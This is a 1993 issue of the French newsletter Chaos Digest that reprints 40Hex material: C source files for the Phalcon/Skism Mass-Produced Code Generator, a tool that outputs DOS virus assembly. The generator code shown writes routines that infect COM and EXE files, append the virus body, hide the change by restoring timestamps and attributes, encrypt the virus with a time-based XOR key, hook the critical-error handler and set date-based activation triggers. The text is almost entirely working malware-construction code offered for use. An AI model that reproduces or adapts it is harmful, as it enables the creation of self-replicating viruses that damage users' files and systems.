Chaos Digest Jeudi 1er Juillet 1993 Volume 1 : Numero 65 ISSN 1244-4901 Editeur: Jean-Bernard Condat ( Archiviste: Yves-Marie Crabbe Co-Redacteurs: Arnaud Bigare, Stephane Briere TABLE DES MATIERES, #1.65 (1er Juillet 1993) File 1--40H VMag Number 8 Volume 2 Issue 4 #001(2) (reprint) Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost by sending a message to: with a mail header or first line containing the following informations: X-Mn-Admin: join CHAOS_DIGEST The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299) groups. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352) 466893. Back issues of ChaosD can be found on the Internet as part of the Computer underground Digest archives. They're accessible using anonymous FTP: * [] in /pub/cud/chaos * [] in /pub/CuD/chaos * [] in /pub/mirror/cud/chaos * [] in /e-serials/alphabetic/c/chaos-digest * [] in /mirror3/EFF/cud/chaos * [] in /pub/text/CuD/chaos * [] in /pub/doc/cud/chaos * [] in /pub/cud/chaos CHAOS DIGEST is an open forum dedicated to sharing French information among computerists and to the presentation and debate of diverse views. ChaosD material may be reprinted for non-profit as long as the source is cited. Some authors do copyright their material, and they should be contacted for reprint permission. Readers are encouraged to submit reasoned articles in French, English or German languages relating to computer culture and telecommunications. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary. DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Chaos Digest contributors assume all responsibility for ensuring that articles submitted do not violate copyright protections. ---------------------------------------------------------------------- Date: Tue May 11 09:24:40 PDT 1993 From: (American_Eagle_Publication_Inc. ) Subject: File 1--40H VMag Number 8 Volume 2 Issue 4 #001(2) (reprint) /* FILE: VHEADER.C */ #include "vheader.h" void code_header(void) { char b[80]; sprintf(b,"; %s : %s by %s",config.asmfilename, (config.virusname[0]) ? config.virusname : "Unknown", (config.authorname[0])? config.authorname: "Unknown"); printlabel(b,""); printlabel("; Created wik the Phalcon/Skism Mass-Produced Code Generator",""); sprintf(b,"; from the configuration file %s",config.configfilename); printlabel(b,""); printblank(); printlabel(".model tiny","Handy directive"); printlabel(".code","Virus code segment"); print("org 100h","COM file starting IP\n"); if (config.p.infectEXE) { sprintf(b,"id = '%s'",; printlabel(b,"ID word for EXE infections"); } if (config.p.infectCOM) if (config.p.encrypt) printlabel("entry_point: db 0e9h,0,0","jmp decrypt"); else printlabel("entry_point: db 0e9h,0,0","jmp startvirus"); printblank(); } ----------------------------------- Cut Here -------------------------------- /* FILE: VHEAP.C */ #include "vheader.h" char heap[30][80]; char max; void code_heap(void) { printlabel("heap:","Variables not in code"); if (max) while (max--) printlabel(heap[max],""); else printlabel("; No heap to speak of",""); printlabel("endheap:","End of virus"); } void addheap(char *s, char *t, char *u) { if (*u) sprintf(heap[max++],"%-20.20s%-20.20s; %-37.37s",s,t,u); else sprintf(heap[max++],"%-20.20s%s",s,t); } void _addheap(char *s) { strcpy(heap[max++],s); } void resetheap(void) { max=0; } ----------------------------------- Cut Here -------------------------------- /* FILE: VINFECT.C */ #include "vheader.h" void write_encrypt(void); void code_infect_EXE(void); void code_infect(void) { if (config.p.infectEXE) { printlabel("infect_exe:",""); code_infect_EXE(); if (config.p.infectCOM) print("jmp short finishinfection",""); } if (config.p.infectCOM) { printlabel("infect_com:","ax = filesize"); print("mov cx,3",""); print("sub ax,cx",""); print("lea si,[bp+offset buffer]",""); print("lea di,[bp+offset save3]",""); print("movsw",""); print("movsb",""); print("mov byte ptr [si-3],0e9h",""); print("mov word ptr [si-2],ax",""); if (config.p.encrypt) { print("add ax,103h",""); print("push ax","needed later"); } } printlabel("finishinfection:",""); print("push cx","Save # bytes to write"); print("xor cx,cx","Clear attributes"); print("call attributes","Set file attributes"); printblank(); print("mov al,2",""); print("call open",""); printblank(); print("mov ah,40h","Write to file"); print("lea dx,[bp+buffer]","Write from buffer"); print("pop cx","cx bytes"); print("int 21h",""); printblank(); print("mov ax,4202h","Move file pointer"); print("xor cx,cx","to end of file"); print("cwd","xor dx,dx"); print("int 21h",""); printblank(); if (config.p.encrypt) { write_encrypt(); } else { print("mov ah,40h","Concatenate virus"); print("lea dx,[bp+startvirus]",""); print("mov cx,heap-startvirus","# bytes to write"); print("int 21h",""); printblank(); } print("mov ax,5701h","Restore creation date/time"); print("mov cx,word ptr [bp+newDTA+16h]","time"); print("mov dx,word ptr [bp+newDTA+18h]","date"); print("int 21h",""); printblank(); print("mov ah,3eh","Close file"); print("int 21h",""); printblank(); print("mov ch,0",""); print("mov cl,byte ptr [bp+newDTA+15h]","Restore original"); print("call attributes","attributes"); printblank(); if (config.maxinfect) { print("dec byte ptr [bp+numinfec]","One mo infection"); print("jnz mo_infections","Not enough"); if (config.p.calls_check) print("pop ax","remove call from stack"); print("jmp done_infections",""); } printlabel("mo_infections: jmp find_next",""); printblank(); } void write_encrypt(void) { if (!config.p.allowzero) printlabel("get_encrypt_value:",""); print("mov ah,2ch","Get current time"); print("int 21h","dh=sec,dl=1/100 sec"); if (!config.p.allowzero) { print("or dx,dx","Check if encryption value = 0"); print("jz get_encrypt_value","Get another if it is"); } print("mov [bp+decrypt_value],dx","Set new encryption value"); addheap("code_store:","db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?)",""); _addheap("; The following code is the buffer for the write function"); print("lea di,[bp+code_store]",""); print("mov ax,5355h","push bp,push bx"); print("stosw",""); print("lea si,[bp+decrypt]","Copy encryption function"); print("mov cx,startencrypt-decrypt","Bytes to move"); print("push si","Save for later use"); print("push cx",""); print("rep movsb",""); printblank(); if (config.xor_value) { char b[80]; sprintf(b,"xor byte ptr [bp+decrypt_loop+%c],0%2.2xh", (config.p.infectEXE) ? '2' : '1', config.xor_value); print(b,config.xor_comment); printblank(); } print("lea si,[bp+write]","Copy writing function"); print("mov cx,endwrite-write","Bytes to move"); print("rep movsb",""); print("pop cx",""); print("pop si",""); print("pop dx","Entry point of virus"); print("push di",""); print("push si",""); print("push cx",""); print("rep movsb","Copy decryption function"); print("mov ax,5b5dh","pop bx,pop bp"); print("stosw",""); print("mov al,0c3h","retn"); print("stosb",""); printblank(); print("add dx,offset startencrypt - offset decrypt","Calculate new"); print("mov word ptr [bp+patch_startencrypt+1],dx","starting offset of"); print("call code_store","decryption"); print("pop cx",""); print("pop di",""); print("pop si",""); print("rep movsb","Restore decryption function"); printblank(); } void code_infect_EXE(void) { print("les ax, dword ptr [bp+buffer+14h]","Save old entry point"); print("mov word ptr [bp+jmpsave2], ax",""); print("mov word ptr [bp+jmpsave2+2], es",""); printblank(); print("les ax, dword ptr [bp+buffer+0Eh]","Save old stack"); print("mov word ptr [bp+stacksave2], es",""); print("mov word ptr [bp+stacksave2+2], ax",""); printblank(); print("mov ax, word ptr [bp+buffer + 8]","Get header size"); print("mov cl, 4","convert to bytes"); print("shl ax, cl",""); print("xchg ax, bx",""); printblank(); print("les ax, [bp+offset newDTA+26]","Get file size"); print("mov dx, es","to DX:AX"); print("push ax",""); print("push dx",""); printblank(); print("sub ax, bx","Subtract header size from"); print("sbb dx, 0","file size"); printblank(); print("mov cx, 10h","Convert to segment:offset"); print("div cx","form"); printblank(); print("mov word ptr [bp+buffer+14h], dx","New entry point"); print("mov word ptr [bp+buffer+16h], ax",""); printblank(); print("mov word ptr [bp+buffer+0Eh], ax","and stack"); print("mov word ptr [bp+buffer+10h], id",""); printblank(); print("pop dx","get file length"); print("pop ax",""); printblank(); if (config.p.encrypt) print("add ax, heap-decrypt","add virus size"); else print("add ax, heap-startvirus","add virus size"); print("adc dx, 0",""); printblank(); print("mov cl, 9",""); print("push ax",""); print("shr ax, cl",""); print("ror dx, cl",""); print("stc",""); print("adc dx, ax",""); print("pop ax",""); print("and ah, 1","mod 512"); printblank(); print("mov word ptr [bp+buffer+4], dx","new file size"); print("mov word ptr [bp+buffer+2], ax",""); printblank(); print("push cs","restore ES"); print("pop es",""); printblank(); if (config.p.encrypt) print("push word ptr [bp+buffer+14h]","needed later"); print("mov cx, 1ah",""); } ----------------------------------- Cut Here -------------------------------- /* FILE: VMAIN.C */ /* The Phalcon/Skism Mass-Produced Code Generator * * Version 0.90a - 27 Jul 92 - Initial Release * * Written by Dark Angel of Phalcon/Skism * * Source code released with 40Hex-8 * */ #include #define MAIN #include "vheader.h" #undef MAIN globals config; void parse_config(void); unsigned getnumber(int line, char *d, char ok, char *next); char getyn(int line, char *d); void setplusminus(char *a, char b); void parseactivate(int line, char *d, char min, char max, char *a, char *b,char *s); void printerror(int line, char c); void getDBname(char *orig, char *name,char *delim); FILE *fp; void main(int argc, char **argv) { char c,filename[80]; puts("PS-MPC ~ Phalcon/Skism Mass Produced Code Generator"); puts(" ~ Version 0.90a Written by Dark Angel\n"); if (argc < 2) { puts("Syntax: PS-MPC ..."); puts(" file1 = name of first configuration file"); puts(" file2 = name of second configuration file"); } for (c=1;c 40) fputc(' ',fp); fprintf(fp,"; %s",t); } else /* if (*t) */ fprintf(fp,s); fprintf(fp,"\n"); } void addvar(char *s, char *t, char *u) { char b[80]; if (*u) sprintf(b,"%-20.20s%-20.20s; %s",s,t,u); else sprintf(b,"%-20.20s%s",s,t); printlabel(b,""); } void parse_config(void) { char b[80]; char *c, *d; int line = 0; globals default_globals = { "", /* Configuration file name */ "", /* Source code file name */ " ", /* EXE ID Word */ "", /* Virus name */ '\'', /* Deliminator for virus name */ "", /* Author name */ '\'', /* Deliminator for author name */ 0, /* Minimum COM size for infection */ 0, /* Maximum COM size for infection */ 0, /* Infections per run */ { 0,0,NONE,0,0,0,0 }, /* flags */ 0, /* xor value */ "", /* xor comment */ 0, /* number of activation conditions */ { 0,0,0,0,0,-1,0,-1,-1,-1,0 }, /* activation conditions */ { 0,0,0,0,0, 0,0, 0, 0, 0,-1} /* plusminus activation conditions */ }; config = default_globals; while (1) { line++; b[0]=0; c = fgets(b,100,fp); if (!b[0]) break; while (isspace(*c)) c++; /* skip initial spaces */ if (!*c || *c == ';') continue; // check if this line is a comment d = c; while (!isspace(*d)) d++; /* isolate one word */ *d++ = 0; /* NULL terminate it */ while (isspace(*d) || (*d == '=')) d++; if (!stricmp(c,"filename")) { c = d; while (!isspace(*d)) d++; /* isolate filename */ *d = 0; strcpy(config.asmfilename,c); } else if (!stricmp(c,"traversal")) switch (toupper(*d)) { case 'N' : config.p.traverse = NONE; break; case 'D' : config.p.traverse = DOT_DOT; break; default : printerror(line,*d); } else if (!stricmp(c,"encryption")) config.p.encrypt = getyn(line,d); else if (!stricmp(c,"infect")) { while (!isspace(*d)) { switch (toupper(*d)) { case 'C' : config.p.infectCOM = 1; break; case 'E' : config.p.infectEXE = 1; break; case ',' : break; default : printerror(line,*d); } d++; } } else if (!stricmp(c,"idword")) {[0] = (isspace(*d)) ? ' ' : *d;[1] = (isspace(*(d+1))) ? ' ' : *(d+1);[2]=0; } else if (!stricmp(c,"minsize")) { if (toupper(*d) == 'A') config.minsize = 1; else { config.minsize = getnumber(line,d,0,0); if (config.maxsize > 1) if (config.minsize > config.maxsize) puts("Error: minsize is greater than maxsize!"); } } else if (!stricmp(c,"maxsize")) { if (toupper(*d) == 'A') config.maxsize = 1; else { config.maxsize = getnumber(line,d,0,0); if (config.minsize > 1) if (config.maxsize < config.minsize) printf("Error: minsize is greater than maxsize!\n"); } } else if (!stricmp(c,"infections")) config.maxinfect = (unsigned char)getnumber(line,d,0,0); else if (!stricmp(c,"errorhandler")) config.p.int24 = getyn(line,d); else if (!stricmp(c,"commandcom")) config.p.CommandCom = getyn(line,d); else if (!stricmp(c,"virusname")) getDBname(d,config.virusname,&config.virusnamedelim); else if (!stricmp(c,"authorname")) getDBname(d,config.authorname,&config.authornamedelim); else if (!stricmp(c,"allowzero")) config.p.allowzero = getyn(line,d); else if (!stricmp(c,"always")) { config.activate.always = getyn(line,d); if (config.activate.always) config.activation++; } else if (!stricmp(c,"ifmonth")) parseactivate(line,d,1,12,&config.activate.month,&config.plusminus.month,"mont h"); else if (!stricmp(c,"ifday")) parseactivate(line,d,1,31,&,&,"day"); else if (!stricmp(c,"ifyear")) { config.activate.year = getnumber(line,d,'+',d); setplusminus((char *)&config.plusminus.year,*d); config.activation++; } else if (!stricmp(c,"ifdow")) parseactivate(line,d,0,6,&config.activate.dow,&config.plusminus.dow,"date of week"); else if (!stricmp(c,"ifmonthday")) { int tempint; char temp=(char)getnumber(line,d,',',d); if ((temp < 1) || (temp > 12)) printf("Invalid month: %d. Must range between 1 and 12.\n",temp); else { d++; tempint = temp*0x100; temp=(char)getnumber(line,d,'+',d); if ((temp < 1) || (temp > 31)) { printf("Invalid day: %d. Must range between 1 and 31.\n",temp); } else { config.activate.monthday=tempint + temp; setplusminus((char *)&config.plusminus.monthday,*d); config.activation++; } } } else if (!stricmp(c,"ifhour")) parseactivate(line,d,0,23,&config.activate.hour,&config.plusminus.hour,"hour") ; else if (!stricmp(c,"ifminute")) parseactivate(line,d,0,59,&config.activate.minute,&config.plusminus.minute,"mi nute"); else if (!stricmp(c,"ifsecond")) parseactivate(line,d,0,59,&config.activate.second,&config.plusminus.second,"se cond"); else if (!stricmp(c,"percentage")) parseactivate(line,d,1,99,&config.activate.percentage,0,"percentage"); else if (!isspace(c)) printf("Error in line %d: Invalid parameter '%s'.\n",line,c); } } unsigned int getnumber(int line,char *d,char ok,char *next) { int temp = 0; while (isdigit(*d)) { temp*=10; temp+=(*d-'0'); d++; } if ((ok == '+') && (!((*d == '+') || (*d == '-'))) && !isspace(*d)) printerror(line,*d); else if (next) *next=*d; return temp; } char getyn(int line,char *d) { switch (toupper(*d)) { case 'Y' : return 1; case 'N' : return 0; default : printerror(line,*d); } return 0; } void setplusminus(char *a, char b) { if (b == '+') *a = 1; else if (b == '-') *a = -1; else *a = 0; } void parseactivate(int line, char *d, char min, char max, char *a, char *b, char *s) { char *c=d; char temp = (char)getnumber(line,d,'+',c); if ((temp < min) || (temp > max)) printf("Invalid %s specified: %d. Range must be between %d & %d.\n",s,temp,min,max); else { *a = temp; if (b != 0) setplusminus(b,*c); config.activation++; } } void printerror(int line, char c) { printf("Error in line %d: Invalid character '%c'.\n",line,c); } void printblank(void) { fprintf(fp,"\n"); } void getDBname(char *orig, char *name,char *delim) { *delim = '\''; orig[strlen(orig)-1] = 0; if (strchr(orig,'\'')) if (strchr(orig,'\"')) { *delim = 0; printf("Error in %s: Both single and double quotes used.",orig); } else *delim = '\"'; if (*delim) strcpy(name,orig); } ----------------------------------- Cut Here -------------------------------- /* FILE: VMESSAGE.C */ #include "vheader.h" void code_messages(void) { char b[80]; addvar("creator","db '[MPC]',0","Mass Produced Code Generator"); if (config.virusname[0]) { sprintf(b,"db %c%s%c,0",config.virusnamedelim, config.virusname, config.virusnamedelim); addvar("virusname",b,""); } if (config.authorname[0]) { sprintf(b,"db %c%s%c,0",config.authornamedelim, config.authorname, config.authornamedelim); addvar("author",b,""); } printblank(); } ----------------------------------- Cut Here -------------------------------- /* FILE: VRETURN.C */ #include "vheader.h" void return_EXE(void); void return_COM(void); void code_return(void) { char s[80]; if (config.activation) printlabel("exit_virus:",""); if (config.p.int24) { print("mov ax,2524h","Restore int 24 handler"); print("lds dx,[bp+offset oldint24]","to original"); print("int 21h",""); print("push cs",""); print("pop ds",""); printblank(); } if (config.p.traverse == DOT_DOT) { print("mov ah,3bh","change directory"); print("lea dx,[bp+origdir-1]","original directory"); print("int 21h",""); printblank(); } print("mov ah,1ah","restore DTA to default"); print("mov dx,80h","DTA in PSP"); if (config.p.infectEXE) { if (config.p.infectCOM) { print("cmp sp,id-4","EXE or COM?"); print("jz returnEXE",""); printlabel("returnCOM:",""); return_COM(); printlabel("returnEXE:",""); return_EXE(); } else /* EXE only */ { return_EXE(); } } else { return_COM(); addvar("save3","db 0cdh,20h,0","First 3 bytes of COM file"); } printblank(); } void return_EXE(void) { print("pop es",""); print("pop ds",""); print("int 21h",""); print("mov ax,es","AX = PSP segment"); print("add ax,10h","Adjust for PSP"); print("add word ptr cs:[bp+jmpsave+2],ax",""); print("add ax,word ptr cs:[bp+stacksave+2]",""); print("cli","Clear intrpts for stack manipulation"); print("mov sp,word ptr cs:[bp+stacksave]",""); print("mov ss,ax",""); print("sti",""); print("db 0eah","jmp ssss:oooo"); addvar("jmpsave","dd ?","Original CS:IP"); addvar("stacksave","dd ?","Original SS:SP"); if (config.p.infectCOM) { addvar("jmpsave2","db ?","Actually four bytes"); addvar("save3","db 0cdh,20h,0","First 3 bytes of COM file"); } else addvar("jmpsave2","dd 0fff00000h","Needed for carrier file"); addvar("stacksave2","dd ?",""); } void return_COM(void) { print("int 21h",""); print("retn","100h is on stack"); } ----------------------------------- Cut Here -------------------------------- /* FILE: VSETUP.C */ #include "vheader.h" void restore_COM(void); void restore_EXE(void); void code_setup(void) { addheap("buffer","db 1ah dup (?)","read buffer"); if (!config.p.encrypt) printlabel("startvirus:","virus code starts here"); print("call next","calculate delta offset"); printlabel("next: pop bp","bp = IP next"); print("sub bp,offset next","bp = delta offset"); printblank(); if (config.p.infectEXE) { if (config.p.infectCOM) /* COM & EXE */ { print("cmp sp,id","COM or EXE?"); print("je restoreEXE",""); printlabel("restoreCOM:",""); restore_COM(); print("jmp short restoreEXIT",""); printlabel("restoreEXE:",""); restore_EXE(); printlabel("restoreEXIT:",""); print("movsw",""); } else /* EXE ONLY */ restore_EXE(); } else restore_COM(); printblank(); if (config.maxinfect) { char b[80]; addheap("numinfec","db ?","Infections this run"); sprintf(b,"mov byte ptr [bp+numinfec],%u",config.maxinfect); print(b,"reset infection counter"); printblank(); } print("mov ah,1Ah","Set new DTA"); print("lea dx,[bp+newDTA]","new DTA @ DS:DX"); print("int 21h",""); printblank(); addheap("newDTA","db 43 dup (?)","Temporary DTA"); if (config.p.traverse == DOT_DOT) { print("mov ah,47h","Get current directory"); print("mov dl,0","Current drive"); print("lea si,[bp+origdir]","DS:SI->buffer"); print("int 21h",""); print("mov byte ptr [bp+backslash],'\\'","Prepare for later CHDIR"); addheap("origdir","db 64 dup (?)","Current directory buffer"); addheap("backslash","db ?",""); printblank(); } if (config.p.int24) { addheap("oldint24","dd ?","Storage for old int 24h handler"); print("mov ax,3524h","Get int 24 handler"); print("int 21h","to ES:BX"); print("mov word ptr [bp+oldint24],bx","Save it"); print("mov word ptr [bp+oldint24+2],es",""); print("mov ah,25h","Set new int 24 handler"); print("lea dx,[bp+offset int24]","DS:DX->new handler"); print("int 21h",""); print("push cs","Restore ES"); print("pop es","'cuz it was changed"); printblank(); } } void restore_EXE(void) { print("push ds",""); print("push es",""); print("push cs","DS = CS"); print("pop ds",""); print("push cs","ES = CS"); print("pop es",""); print("lea si,[bp+jmpsave2]",""); print("lea di,[bp+jmpsave]",""); print("movsw",""); print("movsw",""); print("movsw",""); if (!config.p.infectCOM) print("movsw",""); } void restore_COM(void) { print("lea si,[bp+save3]",""); print("mov di,100h",""); print("push di","For later return"); if (!config.p.infectEXE) print("movsw",""); print("movsb",""); } ----------------------------------- Cut Here -------------------------------- ------------------------------ End of Chaos Digest #1.65 ************************************